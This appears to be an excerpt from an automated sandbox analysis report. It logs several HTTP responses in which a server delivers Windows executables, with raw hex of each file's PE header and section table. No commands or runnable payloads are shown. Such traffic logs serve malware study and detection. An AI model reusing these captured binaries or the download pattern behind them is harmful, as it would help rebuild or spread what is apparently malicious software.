10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 6d 00 00 00 20 01 00 00 6e 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 f3 5d 01 00 90 01 00 00 72 01 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 b9 01 00 00 90 5f 01 00 ba 01 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 13 00 00 00 50 61 01 00 14 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 